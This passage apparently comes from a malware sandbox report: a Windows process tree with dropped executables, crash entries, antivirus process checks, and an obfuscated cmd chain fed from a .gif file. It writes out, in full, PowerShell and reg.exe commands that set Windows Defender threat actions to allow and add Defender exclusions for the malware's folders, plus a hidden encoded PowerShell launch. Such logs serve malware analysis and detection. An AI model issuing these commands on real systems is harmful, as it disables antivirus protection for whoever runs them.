                                                                  PID:4068
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1176
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:2732
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2604 -ip 2604
                                                          1⤵
                                                            PID:1420
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3976 -ip 3976
                                                            1⤵
                                                              PID:4728
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2796 -ip 2796
                                                              1⤵
                                                                PID:1436
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4068 -ip 4068
                                                                1⤵
                                                                  PID:1856
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 620 -ip 620
                                                                  1⤵
                                                                    PID:1284
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3812 -ip 3812
                                                                    1⤵
                                                                      PID:1072
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 620 -ip 620
                                                                      1⤵
                                                                        PID:2468
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3812 -ip 3812
                                                                        1⤵
                                                                          PID:1852
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                          1⤵
                                                                            PID:2432
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd
                                                                              2⤵
                                                                                PID:5584
                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                  tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                  3⤵
                                                                                  • Enumerates processes with tasklist
                                                                                  PID:5728
                                                                                • C:\Windows\SysWOW64\find.exe
                                                                                  find /I /N "bullguardcore.exe"
                                                                                  3⤵
                                                                                    PID:1652
                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                    tasklist /FI "imagename eq PSUAService.exe"
                                                                                    3⤵
                                                                                    • Enumerates processes with tasklist
                                                                                    PID:5416
                                                                                  • C:\Windows\SysWOW64\find.exe
                                                                                    find /I /N "psuaservice.exe"
                                                                                    3⤵
                                                                                      PID:5300
                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                      findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                      3⤵
                                                                                        PID:5124
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                        Accostarmi.exe.pif N
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        • Suspicious use of SendNotifyMessage
                                                                                        PID:5240
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:904
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 12
                                                                                            5⤵
                                                                                            • Program crash
                                                                                            PID:5676
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 432
                                                                                    1⤵
                                                                                    • Program crash
                                                                                    PID:4880
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1f6999b8-46b2-44e9-ad2e-b772542ddf45.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1f6999b8-46b2-44e9-ad2e-b772542ddf45.exe"
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks processor information in registry
                                                                                    PID:2216
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 620 -ip 620
                                                                                    1⤵
                                                                                      PID:3252
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 444
                                                                                      1⤵
                                                                                      • Program crash
                                                                                      PID:4152
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 620 -ip 620
                                                                                      1⤵
                                                                                        PID:5196
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5352 -ip 5352
                                                                                        1⤵
                                                                                          PID:5428
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 620 -ip 620
                                                                                          1⤵
                                                                                            PID:5488
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 620 -ip 620
                                                                                            1⤵
                                                                                              PID:5572
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 620 -ip 620
                                                                                              1⤵
                                                                                                PID:5664
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3580 -ip 3580
                                                                                                1⤵
                                                                                                  PID:5816
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 620 -ip 620
                                                                                                  1⤵
                                                                                                    PID:5948
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2924 -ip 2924
                                                                                                    1⤵
                                                                                                      PID:636
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3784 -ip 3784
                                                                                                      1⤵
                                                                                                        PID:2860
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3976 -ip 3976
                                                                                                        1⤵
                                                                                                          PID:1092
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2604 -ip 2604
                                                                                                          1⤵
                                                                                                            PID:5392
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2220 -ip 2220
                                                                                                            1⤵
                                                                                                              PID:6004
                                                                                                            • C:\Windows\SysWOW64\asxefvjw\kbcegxmf.exe
                                                                                                              C:\Windows\SysWOW64\asxefvjw\kbcegxmf.exe /d"C:\Users\Admin\nbceglyb.exe"
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:4296
                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                svchost.exe
                                                                                                                2⤵
                                                                                                                  PID:5440
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 516
                                                                                                                  2⤵
                                                                                                                  • Program crash
                                                                                                                  PID:1532
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                  PID:5272
                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                    2⤵
                                                                                                                      PID:3640
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4296 -ip 4296
                                                                                                                    1⤵
                                                                                                                      PID:3680
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2924 -ip 2924
                                                                                                                      1⤵
                                                                                                                        PID:3420
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2924 -ip 2924
                                                                                                                        1⤵
                                                                                                                          PID:328
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2924 -ip 2924
                                                                                                                          1⤵
                                                                                                                            PID:5680
                                                                                                                          • C:\Users\Admin\AppData\Local\cache\MoUSO.exe
                                                                                                                            C:\Users\Admin\AppData\Local\cache\MoUSO.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1548
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\yibxqQt.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\yibxqQt.exe j6 /site_id 525403 /S
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in System32 directory
                                                                                                                            PID:6064
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                              2⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:5144
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:4836
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                    4⤵
                                                                                                                                      PID:2796
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:1336
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:5308
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1656
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:4548
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:3960
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:4672
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4424
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4932
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6088
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6044
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1044
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3420
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5988
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:1388
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:516
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2636
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3132
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2200
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2436
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:2152
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5056
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4004
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3044
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:2604
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3496
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:4564
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4268
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3628
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4060
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4392
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5392
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5928
                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                  3⤵
